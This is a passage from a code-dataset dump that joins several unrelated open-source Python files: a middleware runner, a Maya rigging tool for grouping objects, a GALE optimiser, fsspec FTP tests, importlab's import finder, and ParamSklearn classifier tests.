names_for_middlewares = self.get_names_for_middlewares()
if middleware_name not in names_for_middlewares:
raise MiddlewareMissingError(middleware_name,
names_for_middlewares)
for i, (name, _) in enumerate(self.middlewares):
if name == middleware_name:
(self.middlewares).pop(i)
break
def run(self, initial_context={}):
context = initial_context
for _, middleware_callable in self.middlewares:
context = middleware_callable(context)
return context
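# Illustrative usage (the middleware names and callables below are hypothetical,
# not part of this module):
#   ware = Ware()
#   ware.add('timer', lambda context: dict(context, timed=True))
#   ware.add('auth', lambda context: dict(context, user='anonymous'))
#   ware.run({'path': '/'})  # -> {'path': '/', 'timed': True, 'user': 'anonymous'}
#   ware.remove('timer')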
| mit | -4,876,543,742,609,040,000 | 33.285714 | 76 | 0.6 | false |
ejekt/rigging-system | Modules/System/groupSelected.py | 1 | 9019 | import maya.cmds as mc
from functools import partial
import os
import System.utils as utils
class GroupSelected:
def __init__(self):
self.objectsToGroup = []
def showUI(self):
# build the grouping GUI
self.findSelectionToGroup()
if len(self.objectsToGroup) == 0:
return
self.dUiElements = {}
if mc.window('groupSelected_UI_window', exists=True):
mc.deleteUI('groupSelected_UI_window')
windowWidth = 300
windowHeight = 150
self.dUiElements['window'] = mc.window('groupSelected_UI_window',
w=windowWidth,
h=windowHeight,
t='Blueprint UI',
sizeable=False,)
self.dUiElements['topLevelColumn'] = mc.columnLayout(adj=True, columnAlign='center', rs=3)
self.dUiElements['groupName_rowColumn'] = mc.rowColumnLayout(nc=2, columnAttach=[1,'right',0], columnWidth=[(1,80), (2,windowWidth-90)])
mc.text(label='Group Name :')
self.dUiElements['groupName'] = mc.textField(text='group')
mc.setParent(self.dUiElements['topLevelColumn'])
self.dUiElements['createAt_rowColumn'] = mc.rowColumnLayout(nc=3, columnAttach=(1,'right',0), columnWidth=[(1,80),(2,windowWidth-170),(3,80)])
# row 1
mc.text(label='Position at :')
mc.text(label='')
mc.text(label='')
# row 2
mc.text(label='')
self.dUiElements['createAtBtn_lastSelected'] = mc.button(l='Last Selected', c=self.createAtLastSelected)
mc.text(label='')
# row 3
mc.text(label='')
self.dUiElements['createAveragePosBtn_lastSelected'] = mc.button(l='Average Position', c=self.createAtAveragePosition)
mc.text(label='')
mc.setParent(self.dUiElements['topLevelColumn'])
mc.separator()
# final row of buttons
columnWidth = (windowWidth/2) - 5
self.dUiElements['buttonRowLayout'] = mc.rowLayout(nc=2,
columnAttach=[(1,'both',10),(2,'both',10)],
columnWidth=[(1,columnWidth),(2,columnWidth)],
columnAlign=[(1,'center'),(2,'center')])
self.dUiElements['acceptBtn'] = mc.button(l='Accept', c=self.acceptWindow)
self.dUiElements['cancelBtn'] = mc.button(l='Cancel', c=self.cancelWindow)
mc.showWindow(self.dUiElements['window'])
self.createTempGroupRepresentation()
self.createAtLastSelected()
mc.select(self.tempGrpTransform, r=True)
mc.setToolTo('moveSuperContext')
def findSelectionToGroup(self):
# filters selection to only contain module transform controls
selectedObjects = mc.ls(sl=True, transforms=True)
self.objectsToGroup = []
for obj in selectedObjects:
valid = False
if obj.find('module_transform') != -1:
splitString = obj.rsplit('module_transform')
if splitString[1] == '':
valid = True
if valid == False and obj.find('Group__') == 0:
valid = True
if valid == True:
self.objectsToGroup.append(obj)
def createTempGroupRepresentation(self):
controlGrpFile = os.environ['RIGGING_TOOL_ROOT'] + '/ControlObjects/Blueprint/controlGroup_control.ma'
mc.file(controlGrpFile, i=True)
self.tempGrpTransform = mc.rename('controlGroup_control', 'Group__tempGroupTransform__')
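        # Uniform scaling setup: the Y scale drives X and Z below, the driven axes and
        # visibility are then locked and hidden, and sy is re-exposed under the alias
        # "globalScale" so the temporary group has a single scale handle.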
mc.connectAttr(self.tempGrpTransform+'.sy', self.tempGrpTransform+'.sx')
mc.connectAttr(self.tempGrpTransform+'.sy', self.tempGrpTransform+'.sz')
for attr in ['sx','sz','v']:
mc.setAttr(self.tempGrpTransform+'.'+attr, l=True, k=False)
mc.aliasAttr('globalScale', self.tempGrpTransform+'.sy')
def createAtLastSelected(self, *args):
controlPos = mc.xform(self.objectsToGroup[-1], q=True, ws=True, t=True)
mc.xform(self.tempGrpTransform, ws=True, absolute=True, t=controlPos)
def createAtAveragePosition(self, *args):
controlPos = [0.0,0.0,0.0]
for obj in self.objectsToGroup:
objPos = mc.xform(obj, q=True, ws=True, absolute=True, t=True)
controlPos[0] += objPos[0]
controlPos[1] += objPos[1]
controlPos[2] += objPos[2]
numberOfObjects = len(self.objectsToGroup)
controlPos[0] /= numberOfObjects
controlPos[1] /= numberOfObjects
controlPos[2] /= numberOfObjects
mc.xform(self.tempGrpTransform, ws=True, absolute=True, t=controlPos)
def cancelWindow(self, *args):
mc.deleteUI(self.dUiElements['window'])
mc.delete(self.tempGrpTransform)
def acceptWindow(self, *args):
groupName = mc.textField(self.dUiElements['groupName'], q=True, text=True)
if self.createGroup(groupName) != None:
mc.deleteUI(self.dUiElements['window'])
def createGroup(self, sGroupName):
# check that group of that name doesn't exist yet
fullGroupName = 'Group__' + sGroupName
if mc.objExists(fullGroupName):
            mc.confirmDialog(title='Name Conflict', m='Group \''+sGroupName+'\' already exists', button='Accept', db='Accept')
return None
# rename the tempGroup to the user specified name
groupTransform = mc.rename(self.tempGrpTransform, fullGroupName)
groupContainer = 'group_container'
if not mc.objExists(groupContainer):
mc.container(n=groupContainer)
containers = [groupContainer]
for obj in self.objectsToGroup:
if obj.find('Group__') == 0:
continue
objNamespace = utils.stripLeadingNamespace(obj)[0]
containers.append(objNamespace+':module_container')
for c in containers:
mc.lockNode(c, lock=False, lockUnpublished=False)
if len(self.objectsToGroup) != 0:
tempGroup = mc.group(self.objectsToGroup, absolute=True)
groupParent = mc.listRelatives(tempGroup, parent=True)
if groupParent:
mc.parent(groupTransform, groupParent[0], absolute=True)
mc.parent(self.objectsToGroup, groupTransform, absolute=True)
mc.delete(tempGroup)
self.addGroupToContainer(groupTransform)
for c in containers:
mc.lockNode(c, lock=True, lockUnpublished=True)
mc.setToolTo('moveSuperContext')
mc.select(groupTransform, r=True)
return groupTransform
def addGroupToContainer(self, sGroup):
groupContainer = 'group_container'
utils.addNodeToContainer(groupContainer, sGroup, includeShapes=True)
groupName = sGroup.rpartition('Group__')[2]
mc.container(groupContainer, e=True, publishAndBind=[sGroup+'.t', groupName+'_T'])
mc.container(groupContainer, e=True, publishAndBind=[sGroup+'.r', groupName+'_R'])
mc.container(groupContainer, e=True, publishAndBind=[sGroup+'.globalScale', groupName+'_globalScale'])
def createGroupAtSpecified(self, sName, sTargetGroup, sParent):
self.createTempGroupRepresentation()
pCon = mc.parentConstraint(sTargetGroup, self.tempGrpTransform , mo=False)[0]
mc.delete(pCon)
scale = mc.getAttr(sTargetGroup+'.globalScale')
mc.setAttr(self.tempGrpTransform +'.globalScale', scale)
if sParent:
mc.parent(self.tempGrpTransform , sParent, absolute=True)
newGroup = self.createGroup(sName)
return newGroup
###-------------------------------------------------------------------------------------------
### UNGROUPED SELECTED CLASS
class UngroupSelected:
def __init__(self):
selectedObjects = mc.ls(sl=True, transforms=True)
filteredGroups = []
for obj in selectedObjects:
if obj.find('Group__') == 0:
filteredGroups.append(obj)
# no group selected just exit
if len(filteredGroups) == 0:
return
groupContainer = 'group_container'
# find any modules nested under the selected group
modules = []
for group in filteredGroups:
modules.extend(self.findChildModules(group))
# gather all module containers
moduleContainers = [groupContainer]
for module in modules:
moduleContainer = module + ':module_container'
moduleContainers.append(moduleContainer)
# unlock each container
for container in moduleContainers:
mc.lockNode(container, l=False, lockUnpublished=False)
# ungroup
for group in filteredGroups:
numChildren = len(mc.listRelatives(group, children=True))
if numChildren > 1:
mc.ungroup(group, absolute=True)
for attr in ['t','r','globalScale']:
mc.container(groupContainer, e=True, unbindAndUnpublish=group+'.'+attr)
parentGroup = mc.listRelatives(group, parent=True)
mc.delete(group)
# for the case that a group is left empty
if parentGroup != None:
parentGroup = parentGroup[0]
children = mc.listRelatives(parentGroup, children=True)
children = mc.ls(children, transforms=True)
if len(children) == 0:
mc.select(parentGroup, r=True)
UngroupSelected()
# lock the container
for container in moduleContainers:
if mc.objExists(container):
mc.lockNode(container, l=True, lockUnpublished=True)
def findChildModules(self, sGroup):
modules = []
children = mc.listRelatives(sGroup, children = True)
if children != None:
for child in children:
moduleNamespaceInfo = utils.stripLeadingNamespace(child)
if moduleNamespaceInfo:
modules.append(moduleNamespaceInfo[0])
elif child.find('Group__') != -1:
modules.extend(self.findChildModules(child))
return modules
| mit | -222,559,346,205,777,180 | 29.98227 | 144 | 0.684777 | false |
ai-se/parGALE | algorithms/serial/gale/gale.py | 1 | 6295 | from __future__ import print_function, division
import sys, os
sys.path.append(os.path.abspath("."))
from utils.lib import *
from algorithms.serial.algorithm import Algorithm
from where import Node, sqrt
__author__ = 'panzer'
def default_settings():
"""
  Default Settings for GALE
:return: default settings
"""
return O(
pop_size = 100,
gens = 50,
allowDomination = True,
gamma = 0.15
)
class GALE(Algorithm):
count = 0
unsatisfied = 0
"""
  .. [Krall2015] Krall, Menzies et al.,
    "GALE: Geometric Active Learning for Search-Based Software Engineering"
    Check the References folder for the paper
"""
def __init__(self, problem, **settings):
"""
Initialize GALE algorithm
:param problem: Instance of the problem
    :param settings: optional keyword overrides (e.g. pop_size, gens)
"""
Algorithm.__init__(self, GALE.__name__, problem)
self.select = self._select
self.evolve = self._evolve
self.recombine = self._recombine
self.settings = default_settings().update(**settings)
def run(self, init_pop=None):
if init_pop is None:
init_pop = self.problem.populate(self.settings.pop_size)
population = Node.format(init_pop)
best_solutions = []
gen = 0
while gen < self.settings.gens:
say(".")
total_evals = 0
# SELECTION
selectees, evals = self.select(population)
solutions, evals = self.get_best(selectees)
best_solutions += solutions
total_evals += evals
# EVOLUTION
selectees, evals = self.evolve(selectees)
total_evals += evals
population, evals = self.recombine(selectees, self.settings.pop_size)
total_evals += evals
gen += 1
print("")
return best_solutions
def get_best(self, non_dom_leaves):
"""
    Return the best row from each of the
    non-dominated leaves.
    :param non_dom_leaves: leaves that survived domination pruning
    :return: (list of best rows, number of objective evaluations performed)
"""
bests = []
evals = 0
for leaf in non_dom_leaves:
east = leaf._pop[0]
west = leaf._pop[-1]
if not east.evaluated:
east.evaluate(self.problem)
evals += 1
if not west.evaluated:
west.evaluate(self.problem)
evals += 1
weights = self.problem.directional_weights()
weighted_west = [c*w for c,w in zip(west.objectives, weights)]
weighted_east = [c*w for c,w in zip(east.objectives, weights)]
objs = self.problem.objectives
west_loss = Algorithm.dominates_continuous(weighted_west,
weighted_east,
mins=[o.low for o in objs],
maxs=[o.high for o in objs])
east_loss = Algorithm.dominates_continuous(weighted_east,
weighted_west,
mins=[o.low for o in objs],
maxs=[o.high for o in objs])
if east_loss < west_loss:
bests.append(east)
else:
bests.append(west)
return bests, evals
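  # _select builds a WHERE-style recursive split of the population (Node.divide) and
  # keeps only the non-dominated leaves; the returned eval count tallies rows that have
  # already been scored on the objectives, so callers can track the evaluation budget.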
def _select(self, pop):
node = Node(self.problem, pop, self.settings.pop_size).divide(sqrt(pop))
non_dom_leafs = node.nonpruned_leaves()
all_leafs = node.leaves()
# Counting number of evals
evals = 0
for leaf in all_leafs:
for row in leaf._pop:
if row.evaluated:
evals+=1
return non_dom_leafs, evals
def _evolve(self, selected):
evals = 0
GAMMA = self.settings.gamma
for leaf in selected:
#Poles
east = leaf._pop[0]
west = leaf._pop[-1]
# Evaluate poles if required
if not east.evaluated:
east.evaluate(self.problem)
evals += 1
if not west.evaluated:
west.evaluate(self.problem)
evals += 1
weights = self.problem.directional_weights()
weighted_west = [c*w for c,w in zip(west.objectives, weights)]
weighted_east = [c*w for c,w in zip(east.objectives, weights)]
objs = self.problem.objectives
west_loss = Algorithm.dominates_continuous(weighted_west,
weighted_east,
mins=[o.low for o in objs],
maxs=[o.high for o in objs])
east_loss = Algorithm.dominates_continuous(weighted_east,
weighted_west,
mins=[o.low for o in objs],
maxs=[o.high for o in objs])
# Determine better Pole
if east_loss < west_loss:
south_pole,north_pole = east,west
else:
south_pole,north_pole = west,east
# Magnitude of the mutations
g = abs(south_pole.x - north_pole.x)
for row in leaf._pop:
clone = row.clone()
clone_x = row.x
for dec_index in range(len(self.problem.decisions)):
# Few naming shorthands
me = row.decisions[dec_index]
good = south_pole.decisions[dec_index]
bad = north_pole.decisions[dec_index]
dec = self.problem.decisions[dec_index]
if me > good: d = -1
elif me < good: d = +1
else : d = 0
# Mutating towards the better solution
row.decisions[dec_index] = min(dec.high, max(dec.low, me + me * g * d))
# Project the mutant
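        # Law-of-cosines projection onto the pole axis: with a = distance to the north
        # pole, b = distance to the south pole and row.c the (cached) pole-to-pole
        # distance, x = (a^2 + c^2 - b^2) / (2c); the small epsilon avoids division by zero.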
a = row.dist(self.problem, north_pole, is_obj=False)
b = row.dist(self.problem, south_pole, is_obj=False)
x = (a**2 + row.c**2 - b**2) / (2*row.c+0.00001)
row.x = x
GALE.count += 1
if abs(x - clone_x) > (g * GAMMA) or not self.problem.check_constraints(row.decisions):
GALE.unsatisfied += 1
row.decisions = clone.decisions
row.x = clone_x
pop = []
for leaf in selected:
for row in leaf._pop:
if row.evaluated:
row.evaluate(self.problem) # Re-evaluating
pop.append(row)
return pop, evals
def _recombine(self, mutants, total_size):
remaining = total_size - len(mutants)
pop = []
for _ in range(remaining):
pop.append(self.problem.generate())
return mutants + Node.format(pop), 0
def _test():
from problems.feature_models.webportal import WebPortal
import time
o = WebPortal()
gale = GALE(o)
start = time.time()
gale.run()
print(time.time() - start)
print(GALE.count, GALE.unsatisfied)
if __name__ == "__main__":
_test() | unlicense | -9,061,544,763,114,333,000 | 28.980952 | 95 | 0.581732 | false |
intake/filesystem_spec | fsspec/implementations/tests/test_ftp.py | 1 | 3434 | import os
import subprocess
import sys
import time
import pytest
import fsspec
from fsspec import open_files
from fsspec.implementations.ftp import FTPFileSystem
here = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture()
def ftp():
pytest.importorskip("pyftpdlib")
P = subprocess.Popen(
[sys.executable, "-m", "pyftpdlib", "-d", here],
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
)
try:
time.sleep(1)
yield "localhost", 2121
finally:
P.terminate()
P.wait()
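# The `ftp` fixture above serves this test directory read-only on localhost:2121; the
# `ftp_writable` fixture used further down is presumably provided by the shared
# conftest.py and yields a (host, port, username, password) tuple for a writable server.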
def test_basic(ftp):
host, port = ftp
fs = FTPFileSystem(host, port)
assert fs.ls("/", detail=False) == sorted(os.listdir(here))
out = fs.cat("/" + os.path.basename(__file__))
assert out == open(__file__, "rb").read()
def test_not_cached(ftp):
host, port = ftp
fs = FTPFileSystem(host, port)
fs2 = FTPFileSystem(host, port)
assert fs is not fs2
@pytest.mark.parametrize("cache_type", ["bytes", "mmap"])
def test_complex(ftp_writable, cache_type):
from fsspec.core import BytesCache
host, port, user, pw = ftp_writable
files = open_files(
"ftp:///ou*",
host=host,
port=port,
username=user,
password=pw,
block_size=10000,
cache_type=cache_type,
)
assert len(files) == 1
with files[0] as fo:
assert fo.read(10) == b"hellohello"
if isinstance(fo.cache, BytesCache):
assert len(fo.cache.cache) == 10010
assert fo.read(2) == b"he"
assert fo.tell() == 12
def test_write_small(ftp_writable):
host, port, user, pw = ftp_writable
fs = FTPFileSystem(host, port, user, pw)
with fs.open("/out2", "wb") as f:
f.write(b"oi")
assert fs.cat("/out2") == b"oi"
def test_with_url(ftp_writable):
host, port, user, pw = ftp_writable
fo = fsspec.open("ftp://{}:{}@{}:{}/out".format(user, pw, host, port), "wb")
with fo as f:
f.write(b"hello")
fo = fsspec.open("ftp://{}:{}@{}:{}/out".format(user, pw, host, port), "rb")
with fo as f:
assert f.read() == b"hello"
@pytest.mark.parametrize("cache_type", ["bytes", "mmap"])
def test_write_big(ftp_writable, cache_type):
host, port, user, pw = ftp_writable
fs = FTPFileSystem(host, port, user, pw, block_size=1000, cache_type=cache_type)
fn = "/bigger"
with fs.open(fn, "wb") as f:
f.write(b"o" * 500)
assert not fs.exists(fn)
f.write(b"o" * 1000)
fs.invalidate_cache()
assert fs.exists(fn)
f.write(b"o" * 200)
f.flush()
assert fs.info(fn)["size"] == 1700
assert fs.cat(fn) == b"o" * 1700
def test_transaction(ftp_writable):
host, port, user, pw = ftp_writable
fs = FTPFileSystem(host, port, user, pw)
fs.mkdir("/tmp")
fn = "/tr"
with fs.transaction:
with fs.open(fn, "wb") as f:
f.write(b"not")
assert not fs.exists(fn)
assert fs.exists(fn)
assert fs.cat(fn) == b"not"
fs.rm(fn)
assert not fs.exists(fn)
def test_transaction_with_cache(ftp_writable):
host, port, user, pw = ftp_writable
fs = FTPFileSystem(host, port, user, pw)
fs.mkdir("/tmp")
fs.mkdir("/tmp/dir")
assert "dir" in fs.ls("/tmp", detail=False)
with fs.transaction:
fs.rmdir("/tmp/dir")
assert "dir" not in fs.ls("/tmp", detail=False)
assert not fs.exists("/tmp/dir")
| bsd-3-clause | 1,466,260,043,482,891,300 | 25.015152 | 84 | 0.586488 | false |
google/importlab | importlab/import_finder.py | 1 | 5424 | # NOTE: Do not add any dependencies to this file - it needs to be run in a
# subprocess by a python version that might not have any installed packages,
# including importlab itself.
from __future__ import print_function
import ast
import json
import os
import sys
# Pytype doesn't recognize the `major` attribute:
# https://github.com/google/pytype/issues/127.
if sys.version_info[0] >= 3:
# Note that `import importlib` does not work: accessing `importlib.util`
# will give an attribute error. This is hard to reproduce in a unit test but
# can be seen by installing importlab in a Python 3 environment and running
# `importlab --tree --trim` on a file that imports one of:
# * jsonschema (`pip install jsonschema`)
# * pytype (`pip install pytype`),
# * dotenv (`pip install python-dotenv`)
# * IPython (`pip install ipython`)
# A correct output will look like:
# Reading 1 files
# Source tree:
# + foo.py
# :: jsonschema/__init__.py
# An incorrect output will be missing the line with the import.
import importlib.util
else:
import imp
class ImportFinder(ast.NodeVisitor):
"""Walk an AST collecting import statements."""
def __init__(self):
# tuples of (name, alias, is_from, is_star)
self.imports = []
def visit_Import(self, node):
for alias in node.names:
self.imports.append((alias.name, alias.asname, False, False))
def visit_ImportFrom(self, node):
module_name = '.'*node.level + (node.module or '')
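        # node.level is the number of leading dots in a relative import (e.g.
        # "from ..pkg import x" has level 2), so the reconstructed name keeps those
        # dots for the resolver to handle later.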
for alias in node.names:
if alias.name == '*':
self.imports.append((module_name, alias.asname, True, True))
else:
if not module_name.endswith('.'):
module_name = module_name + '.'
name = module_name + alias.name
asname = alias.asname or alias.name
self.imports.append((name, asname, True, False))
def _find_package(parts):
"""Helper function for _resolve_import_versioned."""
for i in range(len(parts), 0, -1):
prefix = '.'.join(parts[0:i])
if prefix in sys.modules:
return i, sys.modules[prefix]
return 0, None
def is_builtin(name):
return name in sys.builtin_module_names or name.startswith("__future__")
# Pytype doesn't recognize the `major` attribute:
# https://github.com/google/pytype/issues/127.
if sys.version_info[0] < 3:
def _resolve_import_versioned(name):
"""Python 2 helper function for resolve_import."""
parts = name.split('.')
i, mod = _find_package(parts)
if mod:
if hasattr(mod, '__file__'):
path = [os.path.dirname(mod.__file__)]
elif hasattr(mod, '__path__'):
path = mod.__path__
else:
path = None
else:
path = None
for part in parts[i:]:
try:
if path:
spec = imp.find_module(part, [path])
else:
spec = imp.find_module(part)
except ImportError:
return None
path = spec[1]
return path
else:
def _resolve_import_versioned(name):
"""Python 3 helper function for resolve_import."""
try:
spec = importlib.util.find_spec(name)
return spec and spec.origin
except Exception:
# find_spec may re-raise an arbitrary exception encountered while
# inspecting a module. Since we aren't able to get the file path in
# this case, we consider the import unresolved.
return None
def _resolve_import(name):
"""Helper function for resolve_import."""
if name in sys.modules:
return getattr(sys.modules[name], '__file__', name + '.so')
return _resolve_import_versioned(name)
def resolve_import(name, is_from, is_star):
"""Use python to resolve an import.
Args:
name: The fully qualified module name.
Returns:
The path to the module source file or None.
"""
# Don't try to resolve relative imports or builtins here; they will be
# handled by resolve.Resolver
if name.startswith('.') or is_builtin(name):
return None
ret = _resolve_import(name)
if ret is None and is_from and not is_star:
package, _ = name.rsplit('.', 1)
ret = _resolve_import(package)
return ret
def get_imports(filename):
"""Get all the imports in a file.
Each import is a tuple of:
(name, alias, is_from, is_star, source_file)
"""
with open(filename, "rb") as f:
src = f.read()
finder = ImportFinder()
finder.visit(ast.parse(src, filename=filename))
imports = []
for i in finder.imports:
name, _, is_from, is_star = i
imports.append(i + (resolve_import(name, is_from, is_star),))
return imports
def print_imports(filename):
"""Print imports in csv format to stdout."""
print(json.dumps(get_imports(filename)))
def read_imports(imports_str):
"""Print imports in csv format to stdout."""
return json.loads(imports_str)
if __name__ == "__main__":
# This is used to parse a file with a different python version, launching a
# subprocess and communicating with it via reading stdout.
filename = sys.argv[1]
print_imports(filename)
| apache-2.0 | 7,626,106,175,522,213,000 | 31.285714 | 80 | 0.599742 | false |
automl/paramsklearn | tests/test_classification.py | 1 | 31256 | import os
import resource
import sys
import traceback
import unittest
import mock
import numpy as np
import sklearn.datasets
import sklearn.decomposition
import sklearn.cross_validation
import sklearn.ensemble
import sklearn.svm
from sklearn.utils.testing import assert_array_almost_equal
from HPOlibConfigSpace.configuration_space import ConfigurationSpace, \
Configuration
from HPOlibConfigSpace.hyperparameters import CategoricalHyperparameter
from ParamSklearn.classification import ParamSklearnClassifier
from ParamSklearn.components.base import ParamSklearnClassificationAlgorithm
from ParamSklearn.components.base import ParamSklearnPreprocessingAlgorithm
import ParamSklearn.components.classification as classification_components
import ParamSklearn.components.feature_preprocessing as preprocessing_components
from ParamSklearn.util import get_dataset
from ParamSklearn.constants import *
class TestParamSklearnClassifier(unittest.TestCase):
def test_io_dict(self):
classifiers = classification_components._classifiers
for c in classifiers:
if classifiers[c] == classification_components.ClassifierChoice:
continue
props = classifiers[c].get_properties()
self.assertIn('input', props)
self.assertIn('output', props)
inp = props['input']
output = props['output']
self.assertIsInstance(inp, tuple)
self.assertIsInstance(output, tuple)
for i in inp:
self.assertIn(i, (SPARSE, DENSE, SIGNED_DATA, UNSIGNED_DATA))
self.assertEqual(output, (PREDICTIONS,))
self.assertIn('handles_regression', props)
self.assertFalse(props['handles_regression'])
self.assertIn('handles_classification', props)
self.assertIn('handles_multiclass', props)
self.assertIn('handles_multilabel', props)
def test_find_classifiers(self):
classifiers = classification_components._classifiers
self.assertGreaterEqual(len(classifiers), 2)
for key in classifiers:
if hasattr(classifiers[key], 'get_components'):
continue
self.assertIn(ParamSklearnClassificationAlgorithm,
classifiers[key].__bases__)
def test_find_preprocessors(self):
preprocessors = preprocessing_components._preprocessors
self.assertGreaterEqual(len(preprocessors), 1)
for key in preprocessors:
if hasattr(preprocessors[key], 'get_components'):
continue
self.assertIn(ParamSklearnPreprocessingAlgorithm,
preprocessors[key].__bases__)
def test_default_configuration(self):
for i in range(2):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
default = cs.get_default_configuration()
X_train, Y_train, X_test, Y_test = get_dataset(dataset='iris')
auto = ParamSklearnClassifier(default)
auto = auto.fit(X_train, Y_train)
predictions = auto.predict(X_test)
self.assertAlmostEqual(0.9599999999999995,
sklearn.metrics.accuracy_score(predictions, Y_test))
scores = auto.predict_proba(X_test)
def test_repr(self):
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
default = cs.get_default_configuration()
representation = repr(ParamSklearnClassifier(default))
cls = eval(representation)
self.assertIsInstance(cls, ParamSklearnClassifier)
def test_multilabel(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
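        # Capping the address space with RLIMIT_AS makes configurations that allocate
        # too much memory fail fast with MemoryError, which the sampling loop below
        # deliberately tolerates.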
dataset_properties = {'multilabel': True}
cs = ParamSklearnClassifier.get_hyperparameter_search_space(dataset_properties=dataset_properties)
print(cs)
cs.seed(5)
for i in range(50):
X, Y = sklearn.datasets.\
make_multilabel_classification(n_samples=150,
n_features=20,
n_classes=5,
n_labels=2,
length=50,
allow_unlabeled=True,
sparse=False,
return_indicator=True,
return_distributions=False,
random_state=1)
X_train = X[:100, :]
Y_train = Y[:100, :]
X_test = X[101:, :]
Y_test = Y[101:, ]
config = cs.sample_configuration()
config._populate_values()
if 'classifier:passive_aggressive:n_iter' in config:
config._values['classifier:passive_aggressive:n_iter'] = 5
if 'classifier:sgd:n_iter' in config:
config._values['classifier:sgd:n_iter'] = 5
cls = ParamSklearnClassifier(config, random_state=1)
print(config)
try:
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
predictions = cls.predict(X_test)
self.assertIsInstance(predictions, np.ndarray)
predicted_probabilities = cls.predict_proba(X_test_)
[self.assertIsInstance(i, np.ndarray) for i in predicted_probabilities]
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except MemoryError as e:
continue
def test_configurations(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
cs = ParamSklearnClassifier.get_hyperparameter_search_space()
print(cs)
cs.seed(1)
for i in range(10):
config = cs.sample_configuration()
config._populate_values()
if config['classifier:passive_aggressive:n_iter'] is not None:
config._values['classifier:passive_aggressive:n_iter'] = 5
if config['classifier:sgd:n_iter'] is not None:
config._values['classifier:sgd:n_iter'] = 5
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
cls = ParamSklearnClassifier(config, random_state=1)
print(config)
try:
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
predictions = cls.predict(X_test)
self.assertIsInstance(predictions, np.ndarray)
                predicted_probabilities = cls.predict_proba(X_test_)
                self.assertIsInstance(predicted_probabilities, np.ndarray)
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except MemoryError as e:
continue
def test_configurations_signed_data(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'signed': True})
print(cs)
for i in range(10):
config = cs.sample_configuration()
config._populate_values()
if config['classifier:passive_aggressive:n_iter'] is not None:
config._values['classifier:passive_aggressive:n_iter'] = 5
if config['classifier:sgd:n_iter'] is not None:
config._values['classifier:sgd:n_iter'] = 5
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits')
cls = ParamSklearnClassifier(config, random_state=1)
print(config)
try:
cls.fit(X_train, Y_train)
X_test_ = X_test.copy()
predictions = cls.predict(X_test)
self.assertIsInstance(predictions, np.ndarray)
                predicted_probabilities = cls.predict_proba(X_test_)
                self.assertIsInstance(predicted_probabilities, np.ndarray)
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
print(traceback.format_exc())
raise e
except MemoryError as e:
continue
def test_configurations_sparse(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
print(cs)
for i in range(10):
config = cs.sample_configuration()
config._populate_values()
if config['classifier:passive_aggressive:n_iter'] is not None:
config._values['classifier:passive_aggressive:n_iter'] = 5
if config['classifier:sgd:n_iter'] is not None:
config._values['classifier:sgd:n_iter'] = 5
print(config)
X_train, Y_train, X_test, Y_test = get_dataset(dataset='digits',
make_sparse=True)
cls = ParamSklearnClassifier(config, random_state=1)
try:
cls.fit(X_train, Y_train)
predictions = cls.predict(X_test)
except ValueError as e:
if "Floating-point under-/overflow occurred at epoch" in \
e.args[0] or \
"removed all features" in e.args[0] or \
"all features are discarded" in e.args[0]:
continue
else:
print(config)
traceback.print_tb(sys.exc_info()[2])
raise e
except RuntimeWarning as e:
if "invalid value encountered in sqrt" in e.args[0]:
continue
elif "divide by zero encountered in" in e.args[0]:
continue
elif "invalid value encountered in divide" in e.args[0]:
continue
elif "invalid value encountered in true_divide" in e.args[0]:
continue
else:
print(config)
raise e
except UserWarning as e:
if "FastICA did not converge" in e.args[0]:
continue
else:
print(config)
raise e
def test_configurations_categorical_data(self):
# Use a limit of ~4GiB
limit = 4000 * 1024 * 1024
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
cs = ParamSklearnClassifier.get_hyperparameter_search_space(
dataset_properties={'sparse': True})
print(cs)
for i in range(10):
config = cs.sample_configuration()
config._populate_values()
